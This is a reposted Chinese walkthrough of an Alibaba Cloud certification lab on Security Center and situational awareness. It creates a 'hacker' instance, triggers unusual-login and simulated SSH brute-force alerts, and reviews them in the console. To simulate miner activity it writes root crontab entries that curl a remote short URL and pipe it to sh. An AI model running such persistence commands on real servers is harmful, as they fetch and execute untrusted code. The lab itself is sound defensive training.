阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

这篇具有很好参考价值的文章主要介绍了阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

“更多玩转云产品”
1、实验概述

通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控

2、实验目标

完成此实验可以掌握的能力有:

在安骑士中添加白名单、登录安全设置

通过态势感知查看实例的相关告警威胁

3、学前建议:

了解安骑士、态势感知控制台

第 1 章:实验背景

1.1 背景知识

安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。
态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。

第 2 章:实验详述

2.1 实验资源

在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。
资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。

2.2 实验步骤

通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
复制用户密码
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
点击登录
一、创建黑客ECS

1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS

点击云服务器ECS
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
此处可以看到,我们的目标站点在华东二
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
点击下图的创建实例
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
镜像选择centos 6.8即可
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
2.网络选择默认vpc即可
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
3.管理员root 密码设定为1234@abcd,实例名可以为hack
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
4.点击确认订单
勾选服务条款,并点击创建实例
5.创建成功

二、将本地IP加入白名单以防被拉黑

1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
2.在产品服务中找到安骑士
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
4.点击添加
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
三、利用不同地域的黑客ECS远程登录监控目标

1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
2.点击登录安全设置

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
4.利用本地远程登录目标ECS

可通过安骑士资产列表查看目标ecs IP地址

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
5.刷新可以看到没有告警提示

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
7.再次刷新,可看到异地登录告警记录
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)

1.本地ssh登录黑客ECS
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
五、通过态势感知进行查看威胁

1.在产品服务->安全->态势感知 打开态势感知控制台

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
2.可以看到有一个安全告警,是之前异地登录的告警
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
4.点击安全大屏,也可查看安全威胁。
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
六、模拟矿机异常行为

在目标主机输入命令,模拟矿机行为

echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l

阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器
过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。
阿里云云安全中心(态势感知)是一个大数据安全分析平台,能对您云上所有资产进行安,安全,阿里云,服务器

“更多玩转云产品”文章来源地址https://www.toymoban.com/news/detail-787791.html

到了这里,关于阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 云计算ACP认证考试题库0-100

    0001.单选题:阿里云的云盾会检查通过公共互联网登录云服务器ECS的来源IP,登录方式包括SSH和远程桌面,当来自某个IP的登录请求出现多次密码错误的情况时,会发出”ECS遭遇密码暴力破解”的报警,当收到这个报警后,最安全的处理方法应该是。 A.通知自己业务平台的所有用户立即

    2024年02月04日
    浏览(40)
  • 阿里云的认证费用是多少?考试要多长时间?

    中国云计算市场,阿里云目前是第一位,比排后面5名同行市场占有率的总和还要多,全球云计算市场,阿里云目前排名第3位,仅次于亚马逊和微软,已经超过了谷歌云。阿里云的市场占有率能够说明市场对于阿里云产品解决方案的需求有多大。所以阿里云认证的含金量当然

    2024年02月09日
    浏览(52)
  • JSD阿里云ECS服务器认证考试流程与题库

    https://developer.aliyun.com/trainingcamp/632e5dd1a3ed4d9c8fbe52f6540d8912?spm=5176.8068049.0.0.2ab86d19U1CmRu 注意: 考试必须从以上链接进入! 1. 打开对应的页面 2. 登录阿里云账号 如果未注册过账号,登录成功会自行注册。 3. 阿里云账号实名认证 由于我们接下来获取的证书上需要体现自己的名字,

    2024年02月15日
    浏览(57)
  • Apsara Clouder基础技能认证-阿里巴巴编程规范考试流程

    1 、阿里Java开发规范考试网站为:阿里巴巴编码规范-阿里云全球培训中心 2 、网址打开后页面为下图,点击“ 立即考试 (图一)”-“ 进入考试 (图二)”   (图一)  (图二)    3、点击“ 进入考试 ”后,则会弹出登录账号的页面,可使用支付宝/阿里云app/钉钉扫码登

    2024年02月11日
    浏览(49)
  • Apsara Clouder基础技能认证-阿里巴巴编程规范考试真题

            作为从事IT行业的编程开发者,我们必须要遵守IT行业编程开发的规范,俗话说:“无规则不成方圆”,大家都会约定俗成的遵守。下面是我的总结在考试中所遇到的题型,字体背景标记为黄色就是答案。 单选1.Lisl子类使用toArray方法实现集合向数组转换,下列哪些

    2024年02月07日
    浏览(61)
  • 【阿里云】Apsara Clouder云计算专项技能认证-云服务器ECS入门,考试真题分享

    以下是阿里云Apsara Clouder云计算专项技能认证-云服务器ECS入门真题汇总篇分享: 1.下列哪一个不是重置ECS密码的步骤? A. 查看实例详情 B.进入控制台 C.远程连接ECS D.点击控制台“概览” 2.针对云服务器ECS安全组说法正确的是 A.是一种物理防火墙 B.仅用于控制安全组内ECS实例的

    2023年04月08日
    浏览(56)
  • 阿里云云计算工程师ACA认证(Alibaba Cloud Certified Associate - Cloud Computing)考试大纲-V3.0

    阿里云云计算工程师ACA认证(Alibaba Cloud Certified Associate - Cloud Computing)介绍: 阿里云云计算工程师ACA认证(Alibaba Cloud Certified Associate - Cloud Computing)考试是面向云计算行业工作人员的初级认证,主要考核考生对云计算领域知识的整体掌控情况。 通过该技术认证可以有效证明

    2024年02月03日
    浏览(72)
  • 微软认证考试AZ-900考试攻略 | 微软云证书

    去年年底已通过了AZ900证书来,来分享当时是怎么备考的吧! Microsoft Certified: Azure Fundamentals,代号为AZ900,是Azure的初级认证考试。微软的认证也是有体系的,当完成初级认证考试后,就可以申请中级认证和高级认证,继续考试。在全民上云时代,掌握一项云技能不再是技术人

    2024年04月25日
    浏览(40)
  • PostgreSQL 考试认证指南:考前准备和考试概述

    下面是关于考前准备和考试概述的指南: 考前准备: 1.确定考试内容:详细了解考试的内容范围和考试要求。可以查阅PostgreSQL官方网站或认证考试指南,以获取相关信息。 2.学习和实践:系统地学习和掌握与PostgreSQL相关的知识和技能。建议使用官方文档、教程和参考书籍作

    2024年02月16日
    浏览(35)
  • 华为的数通认证考试难不难?考试费用是多少?

    自从网络出现在我们的世界后,人类社会发生了巨大的变化,我们每个人的生活和网络息息相关,传统的购物、出行、社交方式发生了巨大的变化,这一切都离不开数通技术的支持,数通一般是指计算机通信网络中数据信号的基带传输、频带传输、数据交换、数据通信网、及

    2024年02月13日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包